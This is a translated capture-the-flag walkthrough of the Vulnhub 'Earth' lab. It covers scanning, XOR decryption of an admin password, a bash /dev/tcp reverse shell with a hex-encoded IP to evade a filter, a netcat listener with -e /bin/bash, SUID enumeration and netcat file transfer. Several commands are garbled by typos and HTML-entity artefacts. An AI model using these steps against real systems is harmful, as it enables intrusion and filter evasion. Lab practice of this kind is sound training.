Vulnhub Series Target Drone-The Planets Earth

Article directory

• Vulnhub Series Target Drone-The Planets: Earth
• • 1. Information collection
  • • 1.1 Host scanning
    • 1.2 Port scanning
    • 1.3 Directory blasting
  • 2. Vulnerability detection
  • • 2.1 XOR decryption
    • 2.2 Decoding
  • 3. Exploiting vulnerabilities
  • • 3.1 Rebound Shell
  • 4. Privilege escalation
  • • 4.1 NC file transfer
  • Netcat (nc) file transfer

Vulnhub series target drone-The Planets: Earth

1. Information collection

1.1 Host Scan

arp-scan -l

1.2 Port Scan

nmap -p- -A 192.168.188.198

It was found that the target drone opened ports 22, 80, and 443.

Visit page

The page reports error request 400. Add DNS resolution to the hosts file.

Visit http://earth.local/

1.3 Directory Explosion

dirsearch -u http://earth.local/ -e * -i 200

The /admin/login directory was exploded, and when I visited it in a browser, I found that it was a login page.

Directory blasting on another page

dirsearch -u https://terratest.earth.local/ -i 200

2. Vulnerability detection

Visit the robots.txt page

It was found that in addition to the regular format that cannot be accessed, there is a Disallow: /testingnotes.* at the end, which is spliced with the above suffix format to access the txt file.

Translate page

Notes on testing secure messaging systems:
*Using XOR encryption as the algorithm should be as secure as that used in RSA.
*Earth has confirmed that they received the message we sent.
*testdata.txt is used to test encryption.
*terra is used as the username for the admin portal.
To-do items:
*How do we securely send monthly keys to Earth? Or should we change keys once a week?
*Need to test different key lengths to prevent brute force. How long should a key be?
*Needs improvements to the messaging interface and admin panel interface, which is currently very basic.

At this point we know that the encryption algorithm is XOR, the username is terra, and there is also a testdata.txt for testing encryption.

Page access/testdata.txt

Translated as follows

According to radiometric dating and other evidence, the Earth was formed 4.5 billion years ago. During the first billion years of Earth's history, life emerged in the oceans and began to influence the Earth's atmosphere and surface, leading to the proliferation of anaerobic and later aerobic organisms. Some geological evidence suggests that life may have emerged as early as 4.1 billion years ago.

Return to the previous page and there are three strings of data below http://earth.local/

Use three secret keys to try to find the password corresponding to the username terra

2.1 XOR decryption

XOR, the full name is Exclusive OR (exclusive OR), is a logical operator. XOR is often used for data encryption, checksum calculation.

Perform XOR operation on Previous Messages and testdata.txt. Here we write a script to XOR decrypt.

import binascii

data1 = "37090b59030f11060b0a1b4e000000000000431b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340 e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a 1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4 f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18 010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104 b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e15 0055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041 c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d 4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1 b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242 150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a01060 0124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12 171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))
print(hex(int(data2,16) ^ int(f,16)))
print(hex(int(data3,16) ^ int(f,16)))

The contents of the testdata.txt file.

Execute the script and the three strings of data obtained are all in hexadecimal.

2.2 Decoding

Use the decoding tool in utools to decode.

first string of characters

second string of characters

The third string of characters

You can see that the first two have no important data, and the third one is repeated earthclimatechangebad4humans

Try username and password to log in

terra
earthclimatechangebad4humans

login successful

Observe the page and find that the command can be executed

Command Execution Vulnerability

Check if there is a flag file and find one /var/earth_web/user_flag.txt

View the /var/earth_web/user_flag.txt file

Get the first flag

3. Vulnerability Exploitation

3.1 Rebound Shell

Now that we can execute the command, we can rebound the shell

bash -i & amp;> /deb/tcp/192.168.188.198/8888 0> & amp;1

Found that the remote connection is prohibited.

In this case, you can hex-encode the IP address or base64-encode the entire command. Here I choose to hex encode the IP address.

IP address decimal conversion.

bash -i > & amp; /dev/tcp/0XC0A8BC9D/8888 0> & amp;1

Then listen to port 8888 on the kali host

nc -lnvp 8888 -e /bin/bash

Successful rebound

View the current user’s permissions

Found that the permissions are low, try to extract.

4. Privilege Elevation

View some files with special permissions

find / -perm -u=s -type f 2>/dev/null

Command analysis:

• -perm -u=s: Indicates matching files based on file permissions. Among them, -perm is used to specify the permissions to be matched, -u represents user permissions, and s represents SetUID permissions. SetUID permission (Set User ID) is a special permission bit. When the user executes the file, it will be executed as the owner of the file.
• -type f: Indicates that only regular files are matched. f here means file.
• 2>/dev/null: Redirect error output (stderr) to /dev/null, that is, discard error information.

See the reset_root file and try to run

Found unable to run.

4.1 NC file transfer

Use nc to transfer files

Enter nc -nlvp 7788 >reset_root on Kali to enable monitoring.

Enter the following command into the target machine

nc 192.168.188.157 7788 < /usr/bin/reset_root

Command analysis:

• Use the Netcat (nc) tool to send the /usr/bin/reset_root file to port 7788 of the receiving end with the IP address 192.168.188.157.

strace debugging tool

Use the strace tool to detect the running process of the reset_root file. If it does not exist, you can download it.

sudo apt install strace

Debug reset_root and grant execution permissions to the reset_root file.

chmod + x reset_root
strace ./reset_root

Command analysis:

• strace is a tool for tracing process system calls and signals
  • strace: Indicates starting the strace tool.
  • ./reset_root: Indicates the executable file or command to be executed.

It was found that the file execution failed because these three files or directories were missing.

Create these three files on the target shell

Enter the target machine terminal to create keys

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

After creation, execute reset_root

Obtained the root password: Earth

Successfully obtained root permissions and got the final flag

Netcat (nc) file transfer

File transfer using Netcat (nc) allows you to quickly transfer files between computers. Netcat is a network tool that can create network connections, send and receive data.

detailed steps:

1. Start listening on the receiving end

   nc -l -p <port> > received_file
   

   Run the above command on the receiving end to listen on the specified port. The -l parameter indicates the listening mode, and the -p parameter is used to specify the listening port number. All incoming data will be redirected to the received_file file.

2. Send files on the sending side

   nc <receiver_ip> <receiver_port> < file_to_send
   

   Run the above command on the sending side to send the file. is the IP address of the receiving end, is the port number opened by the receiving end, < file_to_send is the name of the file to be sent or path. Netcat will send the contents of the file to the receiving end over the network.

3. The receiving end receives the file:

   The receiving end will write the data to the file specified by received_file. You can find the file in the receiving end's file system and process it further.

Make sure the following when using it:

• There is a network connection between the sender and receiver, and the network settings are correct.
• The receiving port is not blocked by a firewall or other network security device.
• Both the sender and receiver have sufficient permissions to read and write the file.
• Make sure the file path and file name are correct.